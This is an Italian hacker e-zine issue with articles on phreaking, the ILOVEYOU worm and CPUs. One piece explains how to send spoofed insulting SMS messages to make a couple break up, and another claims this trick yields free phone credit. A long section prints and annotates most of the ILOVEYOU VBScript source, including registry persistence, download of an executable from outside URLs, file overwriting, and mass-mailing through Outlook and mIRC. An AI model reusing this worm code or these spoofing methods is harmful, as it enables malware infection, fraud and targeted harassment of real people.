| Benvenuti anke oggi nel fantastiko mondo della Melevisione!!! |
\______________________________________________________________/

Oggi ero molto provato quindi mi andava di scrivere kos...
Mettiamo ora ke, mentre vi state guardando in pace la Melevisione, vi
rikoradate ke un koglione forte, e ripeto, moooolto forte, ha kome ragazza una
stupenda tettona... oki avete tutt'e due i numba di cell??? Oki, ora da
perfetti bastardi li farete litigare... kome? Uhuh, ve lo dice mR_bIs0n...
nono, non vi preokkupate, non pagate nulla...

Mucho bien (quando ho scritto kos mi sono sentito male assumendo questa
faccia :-)... pensate kuando sto bene...), ora vi kollegate immediatamente al
sito www.gsmbox.com (da non scrivere www.gsm box.com perkŠ ci sono dei
koglioni ke lo fanno...), ora al men— a sinistra c'Š la voce "SMS Firmati"...

Accedete alla sezione, vi registrate inserendo dati fasulli (attenzione ke
vogliono sapere anke kuanti peli ha nel kulo vostro nonno...), mettendo per•
il numero di cellulare giusto, quello ke mander… dei brutti sms, non il numba
di quello ke li ricever…... sceglietevi una buona user e pass... oki fatto
tutto ci•, entrate nella sezione e mandsate gli sms kon tanti insulti...
rikordatevi ke gli sms avranno kome mittente quello ke avete scelto
divertitevi... magari se vi passa per la testa fatemi konoscere la bella
ragazza tettona ke avete fatto lasciare kol koglione...

ATTENZIONE INKONVENIENTE...
Quei maledetti bastardi della GSMBOX inseriskono alla fine di ogni sms la
scritta "- by GSMBOX -", ne potevano fare proprio a meno, ma purtroppo...
vedete un po'voi kome raggirare il problem... magari mandandone altri sempre
kos facendo kapire ke lo si inserisce sempre...

CIAOOOOOOOOOOOOOOOOOOOooooooooooooooooooooooo........................

---mR_bIs0n---


----------------------------------------------------[ pHreAkinG/Cellulars ]---
===] RICARICARE IL CELLULARE (A GRATIS!) [====================================
-----[ mR_bIs0n ]-------------------------------------------------------------
NEWZ DA mR_bIs0n, l'uniko phreaker nel suo paese!!!

EILAAAAA mando sto art, ke Š pi— un messaggio veloce veloce... sikuramente
parekkie persone si kiedono kome fare per rikarikarsi gratiz il cell tim...
bene se avete l'autorikarika 190 potete sfruttare un partikolare metodo...

Sapete bene ke se arrivono sms da un numero TIM vi dovrebbe addebitare non
so'quanta konversazione... bene, molti dicevano di mandare sms da internet dal
sito www.loxxxxxxxcom.it... io invece vi konsiglio di usare il metodo ke vi ho
deskritto nell'art sempre su questo numero di AIS "Come far litigare due amici
o fidanzati e, di conseguenza, goderne..."
, infatti potete mettere qualsiasi
numero di tim e mandarvi sms a sbafo rikarikandovi il cell... fatene buon
uso... ah dimentikavo... Š kompletamente legale...
CIAO!!!

---mR_bIs0n---

------------------------------------------------------------------[ vIrIi ]---
===] ANALISI DEL VIRUS "ILOVEYOU" ]===========================================
-----[ Away ]-----------------------------------------------------------------

www.nails.cjb.net away@subdimension.com

Prefazione:
Non ci posso credere!!! un virus troppo coglione che ha infettato mezzo
mondo!!! la CIA infettata!!!! incredibile...
cmq, a parte il grande rumore generato da tale virus, mi è sembrato utile
fare questo file di analisi - completo di sorgente - a scopo puramente
informativo, quindi se ve lo modificate e fate cazzate, io non mi assumo
alcuna responsabilità. E' semplice informazione. Non speditelo, non infettate
nessuno e non rompete il cazzo al prossimo...:) io ve l'ho detto
Ad ogni modo, può essere una buona occasione (lo è stata per me) per
imparare qualcosina in VBS, che fa sempre comodo.
Inoltre otterrete informazioni aggiuntive per le precauzioni nei confronti
di tale metodologia di virus -> detto in italiano, saprete difendervi
meglio dopo aver letto, almeno sapete dove guardare per capire se siete
infetti...ad ogni modo, iniziamo.

Descrizione:
Il virus è uno script realizzato in vbs. Arriva per email con un messaggio
il cui subject è "ILOVEYOU". In allegato a tale messaggio c'è il virus, col
nome Iloveyou.vbs. Se non si accede all'allegato, il virus non è operativo.
Ma analizziamolo meglio col sorgente completo! :)

Ecco qua:
(i REM in maiuscolo li ho aggiunti io....)

./NOTA DELLA REDAZIONE\.

=[ IL CODICE SORGENTE E' DISPONIBILE IN FORMATO ZIPPATO X EVITARE DI FARE ]=
-[ ALLARMARE L'ANTIVIRUS OGNI VOLTA CHE APRITE L'E-ZINE! ]-

./FINE NOTA DELLA REDAZIONE\.

Quindi ricapitolando, che fa sto virus?
-si duplica nel vostro hd nella directory windows sotto diversi nomi e
inserisce delle chiavi nel registry in modo che venga invocato ogni volta che
si apre il winzoz;
-scarica un altro virus dal net tramite il browser e lo inserisce nel
registry;
-infetta immagini, mp3, file di script, una marea di roba....e qua sono i
danni!!!
-inserisce uno script nel mIRC per auto-inviarsi via chat in tutti i canali in
cui andate....
-si spedisce automaticamente anche a tutti gli indirizzi nel vostro address
book di outlook.

E' un buon esempio di programmazione per capire come fare diverse cose utili
col VBS (agire sul registry, sui files, email...).
Ad ogni modo non riesco a capire come la CIA si sia fatta infettare da una
robetta così idiota...
Nei giorni successivi, si sono visti in giro diversi altri virus, varianti di
questo, nonchè le case produttrici di virus ne hanno approfittato per update
(chi gratis, chi a pagamento...), ma comunque se avete capito il meccanismo,
è abbastanza facile da eliminare se siete infetti, anche se vi arrivasse per
email, non aprite semplicemente gli allegati, date un'occhiata alle
impostazioni del vostro client di posta elettronica e, che dirvi, imparate,
imparate, imparate...e sperimentate! ;)

Per concludere:
un pò di email interessanti che mi sono arrivate sul virus ....

Subject: {V-L} Now they even try to make money with VBS.ILoveYou

> Date sent: Fri, 05 May 2000 10:26:57 -0400
> From: Admin <info@Aquari.net>
> Subject: URGENT Re: Virus Domains
> To: Admin <info@Aquari.net>
>
> Hello,
>
> As you know in the past 24 hours a virus as spread across
> the world. Yesterday afternoon we undertook to purchase
> domain names related to the virus in order to offer a
> solution to seekers and promote our services. We would like
> to offer you the chance to promote your anti-virus services
> by using one or several of these domain names;
>
> vbs-loveletter.com
> vbsloveletter.com
> vbsloveletter.net
> vbsloveletter.org
> vbslovelettervirus.com
> lovelettervirus.net
> loveletterworm.com
> iloveyoubug.com
> iloveyoubug.net
> iloveyoubug.org
> iloveyouworm.com
> iloveyouantidote.com
> iloveyouantidote.net
> iloveyouantidote.org
> jokevirus.net (Virus new name)
> veryfunnyvirus.com (Virus new name)
> pandacan.com (City where perpetrator is located)
>
> All of these domains will be actively available to the
> world by mid-day today, therefore, time is of the essence.
> If you are interested, please contact us by phone
> at (514) 908-0-908.
>
> Andy Srougi
> President
> Aquari.net inc.
> info@Aquari.net

insomma, c'è gente che pur di fare un pò di soldi....ehehee

Subject: {V-L} Here are a Killer for Iloveyou Letter

Hello People´s !


Here are a Killer for the Virus. I.Love.you.VBS
allegato [] Kill.Iloveyou.vbs


c'è gente che spaccia il virus per un antivirus....occhio eh?!?

Sempre da un email, mi si informa che:
Dal sito http://www.quickheal.com è possibile scaricare l'utility per
identificare ed eliminare il nuovo virus "I love you".

A tutto questo voglio aggiungere una email che mi è pervenuta, di
Santo-Satanello (col quale spero non ci saranno problemi per questo
cut & paste...ok?):

Subject: I LOVE CUCARACHA! Non se ne può più!!!
To: Anarchy in the System <aisprodML@listbot.com>

E' incredibile, siamo nel medio evo dell'era
informatica! 1000 Anni fa, si veniva puniti dalla gente, torturati
e messi al rogo se si veniva sospettati di essere untori, e noi li
critichiamo da grande popolo colto snobbando e criticando quelle che
definiamo credenze popolari. Oggi le cose non sono cambiate; basta avere
un minimo di potere nella comunicazione di massa per trasformare un
software da 5Kbyte quasi del tutto inoffensivo se non verso alcuni
programmi per trasformarlo in una calamità mondiale! E nel giro di
una settimana al massimo non se ne parla più... E così la prassi si
ripete, anche se in tempi un pò più moderni: si viene prelevati da quei
tizi oscuri del Federal Bureau o qualche altra organizzazione, si
viene interrogati, e imprigionati a loro discrezione.......
L'altra grande catastrofe informatica doveva essere il temuto e oscuro
Millennium Bug, dove sembrava che tutti gli spazzolini da denti
elettrici si dovessero fermare di colpo mettendo a repentaglio l'igene
orale della popolazione del pianeta!
Ecco, mi sento un ingenuo, i miei 21 anni non bastano per spiegarmi come
mai ai giornalisti piace fare così tanto allarmismo! Oppure c'è un giro
di interessi tale per cui conviene farlo? Se è così mi metto subito al
lavoro per fare un macrovirus polimorfico in assembler (ma che vuol
dire?) che con fare ritmico permette a tutte le schede madri di tutti i
computer del mondo (pentagono compreso! E' d'obbligo!!!) di ballare la
cucaracha!!! Consigliatemi se potete, una direzione verso cui
guardare! Saluti dall'antichità, sperando in tempi migliori..................

-sAnto.sAtanello-

Niente da aggiungere a quanto detto.

Note Finali: il tipo che ha fatto il virus è stato beccato, non si sa
ancora cosa rischia, a quanto ne so è stato beccato dalla caller-id (cioè
dall'identificativo di chiamata al provider...occhio...), meditate...
La Microsfot ha annunciato che presto uscirà una patch per il suo
GuardaFuori Espresso (così lo chiama un mio amico, hi mav!) per evitare
l'autopreview degli allegati, anche qua non possiamo fare altro che
ringraziare lo zio bill per il suo software efficiente....:))

Questo è tutto.
Avete un'idea per una modifica interessante? Ho detto qualche cazzata?
Ne avete fatto uno più bello? speditemelo che se ne riparla
(ovviamente zippato, che altrimenti vi inc*lo...:)
Alla prossima,

---Away---

------------------------------------------------------------------[ vIrIi ]---
===] "ILOVEYOU" THE DEBUG ]===================================================
-----[ ValK ]-----------------------------------------------------------------

ovvero come zio bil si
frega con le proprie mani
_________________________
|*** PREMESSA ***|
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
*** io non uso virgole ***

Diamo inizio all'avventura ;)
ok.
Essendo io un appassionato di visula basic mi risulto' facile all'epoca
(eh eh eh quanto tempo)disattivare questa sottospece di worm che si infilo'
tra le lettere delle mie spasimanti con la poco sospetta (e' sarcasmo)
scritta : " I LOVE YOU "
p.s. i need your body now (eh eh eh)

Appena aperto il verme schifoso mi nascose i miei inportantissimi mp3 ('tacci
sua...) e li' mi adirai parekkio, allora prendo quella lettera strana
arrivatami diedi uno sguardo con la debbuger script machine di Zio sBill
Gate$ tm trovare l'infame nascosto e in ke linguaggio tra i piu' lamer era
scritto??? IN VBScript!!!!

FU LA SUA MORTE

_____________________
| |
| QUI GIACE IL |
| MALEDDETTO _|_ |
| VERMACCIO | |
| SCHIFOSO | |
| |
| |
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
scovai ogni call ogni file da lui creato ogni chiamata a strutture di
sistema.
All'inizio pensavo fosse qualke kazzate ci avevo perso in fin dei conti solo
6 ore... ma poi la bestia chiamata MASS MEDIA lo scopri' e fu cosi' che oltre
a fa' danni fu pure famoso azz... cmq cosa fa' i love u oltre all'illusione
di essere amati?

E' quello che scopriremo

ECCOVI:

I LOVE U -debbuged-

Okiz sappiate che farlo nonn e' stato facile quanto disinnescarlo.
E cmq per fare una pazzia del genere dovevo essere pippato o kess'io, sappiate
solo una kosa:

NON LO RIFAREI!!!!!!
tempo impiegato: 13 ore


********************************************
* ECCO IL SORGENTE DI LL4U *
********************************************

<ndr: Stesso discorso di sopra....>

*******************************************
* *
* ED ECCO A VOI IL DEBUG !!!!! *
* *
*******************************************


<------- inizio codice ------->
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject(]-]WScript.Shell]-])
rr=wscr.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%
-%Windows Scripting Host%-%Settings%-%Timeout]-])
if (rr>=1) then
wscr.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%
-%Windows Scripting Host%-%Settings%-%Timeout]-],0,]-]REG_DWORD]-]
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem =Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&]-]%-%MSKernel32.vbs]-])
c.Copy(dirwin&]-]%-%Win32DLL.vbs]-])
c.Copy(dirsystem&]-]%-%LOVE-LETTER-FOR-YOU.TXT.vbs]-])
regruns()
html()
spreadtoemail()
listadriv()
end sub
<------- fine codice ------->


********* DEBUG ***********

eh eh eh eh
cosa fa' il sub main? crea un oggetto shell nel vbscript, legge delle chiavi
del registro se gia' siete infetti kade se no!!!!!
CHE IL WORM VI INVADA
scrive nel registro che siete infettati

si setta un po' di dir
{
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem =Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
}

si apre il suo bel file, e vi schiaffa i file :
{
MSKernel32.vbs
Win32DLL.vbs
LOVE-LETTER-FOR-YOU.TXT.vbs
}

e chiama le funzioni:
{
regruns()
html()
spreadtoemail()
listadriv()
}

<------- inizio codice ------->

sub regruns()
On Error Resume Next
Dim num,downread
regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%
-%Microsoft%-%Windows%-%CurrentVersion%-%Run%
-%MSKernel32]-],dirsystem&]-]%-%MSKernel32.vbs]
regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%
-%CurrentVersion%-%RunServices%-%Win32DLL]-],dirwin&]-]%
-%Win32DLL.vbs]-]
downread=]-]]-]
downread=regget(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%
-%Internet Explorer%-%Download Directory]-])
if (downread=]-]]-]) then
downread=]-]c:%-%]-]
end if
if (fileexist(dirsystem&]-]%-%WinFAT32.exe]-])=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%
-%Start Page]-],]-]http://www.skyinet.net/~young1s/
HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/
WIN-BUGSFIX.exe]-]
elseif num = 2 then
regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%
-%Start Page]-],]-]http://www.skyinet.net/~angelcat/
skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/
WIN-BUGSFIX.exe]-]
elseif num = 3 then
regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%
-%Start Page]-],]-]http://www.skyinet.net/~koichi/
jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe]-]
elseif num = 4 then
regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%-%Star
-%Main%-%Start Page]-],]-]http://www.skyinet.net/~chu/
sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglk
NBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe]-]
end if
end if
if (fileexist(downread&]-]%-%WIN-BUGSFIX.exe]-])=0) then
regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%
-%CurrentVersion%-%Run%-%WIN-BUGSFIX]-],downread&]-]%-%WIN-BUGSFIX.exe]-]
regcreate ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%Internet Explorer%
-%Main%-%Start Page]-],]-]about:blank]-]
end if
end sub

<------- fine codice ------->

********* DEBUG ***********

si crea i suoi bei LinK nel registro ai file .vbs di prima

vede se avete settata la dir di download di msexplorer se no la setta su c:\
poi si scarica un file da dei link in una sequenza random tra quelli scelti
dal malvivente che ha programmato sta' mezza schifezza.
...E ve la mette come autorun all'avvio del pcozzo


<------- inizio codice ------->
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&]-]%-%]-])
end if
Next
listadriv = s
end sub
<------- fine codice ------->

********* DEBUG **************
questa routine semplicemente verifica se esistono + hd e se si ci usa sopra la
funzione folderlist


********DEBUG********
* *
* HIS CORE NOW! *
* *
*********************

Eccolo!!!! e' lui !!! il cuore!! e la mente del LL4U (non e' Lesuire-suite
Larry 4 ma Love Letter 4 U) ho deciso di dividerlo in parti + piccole perche'
come routine era troppo grande



**************************************
*<------- inizio codice mastro ------->*
**************************************

<------- inizio codice slave 1 ------->
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,extdim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext=]-]vbs]-]) or (ext=]-]vbe]-]) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext=]-]js]-]) or (ext=]-]jse]-]) or (ext=]-]css]-]) or (ext=]-]wsh]-])
or (ext=]-]sct]-]) or (ext=]-]hta]-]) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
<------- fine codice slave 1 ------->

************** DEBUG *****************
allora qui il verme si becca la base della forlder passatagli da listadriv()
e la in f, poi si becca tutti i file della forlder eli schiaffa in fc, di
seguito per ogni fc in f1 si prende la path base e la scariva, in lettere
minuscole, nella var ext SE trova file con l'estenzione vbs o vbe apre questo
file e ci scrive dentro al suo interno la directory dove si e' nascosto sto
schifoso vermaccio,ALTRIMENTI se trova file con estensione:

js, jse, css, wsh, sct, hta
fa' la stessa cosa di prima....


<------- inizio codice slave 2 ------->
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&]-]%-%]-]&bname&]-].vbs]-])
fso.DeleteFile(f1.path)
elseif(ext=]-]jpg]-]) or (ext=]-]jpeg]-]) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.patt cop=fso.GetFile(f1.path)
cop.copy(f1.path&]-].vbs]-])
fso.DeleteFile(f1.path)
elseif(ext=]-]mp3]-]) or (ext=]-]mp2]-]) then
set mp3=fso.CreateTextFile(f1.path&]-].vbs]-])
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
<------- fine codice slave 2 ------->

*********** DEBUG ***************
allora si mette in bname il nome base del DEL FILE contenuto in f1, poi si
carica le proprieta' del suddetto file poi se l'estenzione e' jpg o jpeg apre
il file e ci copia dentro la posizione nell'hd del worm malefco.
In seguito il file viene preso se il file e' di estensione .mp3 o .mp2 crea un
file identico a lui .vbs col suo codice malefico, poi gli da' come attributo
hide (nascosto)


<------- inizio codice slave 2 ------->
if (eq<>folderspec) then
if (s=]-]mirc32.exe]-]) or (s=]-]mlink32.exe]-]) or (s=]-]mirc.ini]-]) or
(s=]-]script.ini]-]) or (s=]-]mirc.hlp]-]) then
set scriptini=fso.CreateTextFile(folderspec&]-]%-%script.ini]-])
scriptini.WriteLine ]-][script]]-]
scriptini.WriteLine ]-];mIRC Script]-]
scriptini.WriteLine ]-]; Please dont edit this script... mIRC will corrupt,
if mIRC will]-]
scriptini.WriteLine ]-] corrupt... WINDOWS will affect and will not run
correctly.
thanks]-]
scriptini.WriteLine ]-];]-]
scriptini.WriteLine ]-];Khaled Mardne ]-];Khaled Mardam-Bey]-]
scriptini.WriteLine ]-];http://www.mirc.com]-]
scriptini.WriteLine ]-];]-]
scriptini.WriteLine ]-]n0=on 1:JOIN:#:{]-]
scriptini.WriteLine ]-]n1= /if ( $nick == $me ) { halt }]-]
scriptini.WriteLine ]-]n2= /.dcc send $nick ]-]&dirsystem&]-]%
-%LOVE-LETTER-FOR-YOU.HTM]-]
scriptini.WriteLine ]-]n3=}]-]
scriptini.close
eq=folderspec
end if
end if
next
end sub
<------- fine codice slave 2 ------->

*********** DEBUG ***************
se invece il file che trova e'

mirc32.exe
mlink32.exe
mirc.ini
script.ini
mirc.hlp

crea il file script.ini e ci schiaffa dentro il codice che fara' poi in modo
che mentre si joina in un kanale e uno dopo di noi ci joina appresso al nuovo
joinato gli mandate il file:

LOVE-LETTER-FOR-YOU.HTM
cosi' da infettare anke lui


<------- fine codice mastro ------->

*********** DEBUG ***************
GOOD LUCK! E LEGGETE SOPRA

<------- inizio codice ------->

sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub

<------- fine codice ------->

*********** DEBUG ***************
passando a questa sub un valore corrispondente ad una cartella

poi schiaffa ogni sf (sub folder) nel valore f1
poi lancia la sub infectfiles e di nuovo se stessa di modo da eseguire la sub
infectfiles per ogni sub folder


<------- inizio codice ------->

sub regcreate(regkey,regvalue)
Set regedit = CreateObject(]-]WScript.Shell]-])
regedit.RegWrite regkey,regvalue
end sub

<------- fine codice ------->

*********** DEBUG ***************
questa sul del kakkio si krea un link nel registro.


<------- inizio codice ------->

function regget(value)
Set regedit = CreateObject(]-]WScript.Shell]-])
regget=regedit.RegRead(value)
end function

<------- fine codice ------->

*********** DEBUG ***************
questa function legge dal registro un valore che noi gli inseriamo come
argomento [qui "value" ]


<------- inizio codice ------->

function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

<------- fine codice ------->

*********** DEBUG ***************
questa function fa' il check di un file se questo file esiste restituisce 1
esiste altrimenti restituisce 0

<------- inizio codice ------->

function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

<------- fine codice ------->

*********** DEBUG ***************
questa function fa' il check di una directory se questo file esiste
restituisce 1 esiste altrimenti restituisce 0


<------- inizio codice ------->

sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject(]-]WScript.Shell]-])
set out=WScript.CreateObject(]-]Outlook.Application]-])
set mapi=out.GetNameSpacfset mapi=out.GetNameSpace(]-]MAPI]-])
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]
-]&a)
if (regv=]-]]-]) then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=]-]]-]
regad=regedit.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]
-]&malead)
if (regad=]-]]-]) then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = ]-]ILOVEYOU]-]
male.Body = vbcrlf&]-]kindly check the attached LOVELETTER coming from me.]-]
male.Attachments.Add(dirsystem&]-]%-%LOVE-LETTER-FOR-YOU.TXT.vbs]-])
male.Send
regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-Software%
-%Microsoft%-%WAB%-%]-]&malead,1,]-]REG_DWORD]-]
end if
x=x+1
next
regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]
-]&a,a.AddressEntries.Count
else
regedit.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]
-]&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub

<------- fine codice ------->

*********** DEBUG ***************
per prima cosa il worm si crea un oggetto, poi ne crea un altro correlato ad
outlook in seguito il bastardo si crea una MApi che va' a leggere l'ultimo dei
destinatari di posta inseriti nella vostra rubrica dopi di ke lo legge dal
registro se non lo trova li' setta la var regv a 1 se poi il count degli
indirizzi e' uguale a quelli nel registro allora per ogni indirizzo manda
una mail con subject: i love you nel body
"love letter coming from me" e come attchment il file malefico altrimenti
aggiunge il count non trovato nel registro e fa' la stessa cosa;)


<------- inizio codice ------->
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1=]-]<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE>
<META NAME=@-@Generator@-@CONTENT=@-@BAROK VBS - LOVELETTER@-@>
]-]&vbcrlf& _]-]
<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>]-]&vbcrlf& _
]-]<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...
@-@>]-]&vbcrlf& _]-]<?-?HEAD><BODY ONMOUSEOUTD>
<BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open
(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ ]-]&vbcrlf& _]-]ONKEYDOWN=
@-@window.name=#-#main#-#;window.open
(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@
BGCOLOR=@-@#FF9933@-@>]-]&vbcrlf& _]-]<CENTER><p>This HTML file need ActiveX
Control<?-?p><p>To Enable to read this HTML file<BR>
- Please press #-#YES#-# button to Enable ActiveX<?-?p>]-]&vbcrlf& _
]-]<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-
@>----------z--------------------z----------<?-?MARQUEE> ]-]&vbcrlf& _
]-]<?-?BODY><?-?HTML>]-]&vbcrlf& _
]-]<SCRIPT language=@-@JScript@-@>]-]&vbcrlf& _
]-]<!--?-??-?]-]&vbcrlf& _
]-]if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;
window.moveTo(0,0);window.resizeTo(wi,hi);}]-]&vbcrlf& _
]-]?-??-?-->]-]&vbcrlf& _
]-]<?-?SCRIPT>]-]&vbcrlf& _
]-]<SCRIPT LANGUAGE=@-@VBScript@-@>]-]&vb@-@>]-]&vbcrlf& _
]-]<!--]-]&vbcrlf& _
]-]on error resume next]-]&vbcrlf& _
]-]dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit]-]&vbcrlf& _
]-]aw=1]-]&vbcrlf& _
]-]code=]-]
dta2=]-]set fso=CreateObject(@-@Scripting.FileSystemObject@-@)]-]&vbcrlf& _
]-]set dirsystem=fso.GetSpecialFolder(1)]-]&vbcrlf& _
]-]code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))]-]&vbcrlf& _
]-]code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))]-]&vbcrlf& _
]-]code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))]-]&vbcrlf& _
]-]set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)]-]&vbcrlf& _
]-]wri.write code4]-]&vbcrlf& _
]-]wri.close]-]
]-]if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then]-]&vbcrlf& _
]-]if (err.number=424) then]-]&vbcrlf& _
]-]aw=0]-]
]-]end if]-]&vbcrlf& _
]-]if (aw=1) then]-]&vbcrlf& _
]-]document.write @-@ERROR: can#-#t initialize ActiveX@-@]-]&vbcrlf& _
]-]window.close]-]&vbcrlf& _
]-]end if]-]&vbcrlf& _
]-]end if]-]&vbcrlf& _
]-]Set regedit = CreateObject(@-@WScript.Shell@-@)]-]&vbcrlf& _
]-]regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-
^Windows^-^CurrentVersion^-^
Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@]-]&vbcrlf& _
]-]?-??-?-->]-]&vbcrlf& _
]-]<?-?SCRIPT>]-]
dt1=replace(dta1,chr(35)&chr(45)&chr(35),]-][-[]-])
dt1=replace(dt1,chr(64)&chr(45)&chr(64),]-]]-]]-]]-])
dt4=replace(dt1,chr(63)&chr(45)&chr(63),]-]/]-])
dt5=replace(dt4,chr(94)&chr(45)&chr(94),]-]%-%]-])
dt2=replace(dta2,chr(35)&chr(45)&chr(35),]-][-[]-])
dt2=replace(dt2,chr(64)&chr(45)&chr(64),]-]]-]]-]]-])
dt3=replace(dt2,chr(63)&chr(45)&chr(63),]-]/]-])
dt6
dt6=replace(dt3,chr(94)&chr(45)&chr(94),]-]%-%]-])
set fso=CreateObject(]-]Scripting.FileSystemObject]-])
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),]-][-[]-],chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),]-]]-]]-]]-],chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),]-]%-%]-],chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&]-]&vbcrlf& _]-]
end if
next
set b=fso.CreateTextFile(dirsystem+]-]%-%LOVE-LETTER-FOR-YOU.HTM]-])
b.close
set d=fso.OpenTextFile(dirsystem+]-]%-%LOVE-LETTER-FOR-YOU.HTM]-],2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.clo dt6
d.close
end sub
<------- fine codice ------->
************* debug ****************
questa routine ricostruisce semplicemente il codice html originale (quello
rinvenuto a manila)

---ValK---

---------------------------------------------------------------[ HaRdwArE ]---
===] L'EVOLUZIONE DEI CPU ]===================================================
-----[ H4mBuck3r ]------------------------------------------------------------

"Long Time Reader ....... First Time Writer"

#include <fantasia.h>
#include <stronzate.h>
#include <pazienza.h>

Allora... iniziamo...innanzitutto mi presento:
sono H4mBuck3r (ma va?) come avrete capito (chi conosce l'inglese!!) è la
prima volta che scrivo un articoluzzo x una E-zine e non so come ma mi è
venuta l'idea di scriverlo proprio sui microprocessori ma se proprio non vi
interessa JFC( salta se Fa Cagare !) at the end.

This the end ....my only friend the end...

Ok basta con le stronzate e iniziamo con i ormai consueti greetings e fuck
dell'e-zinista che si rispetti...

Saluti: prima di tutto saluto Old (sia Drake che Iron hihhih :-P ) poi tutti
quelli che, seguono-leggono o collaborano x AiS tutti i memberz del progetto
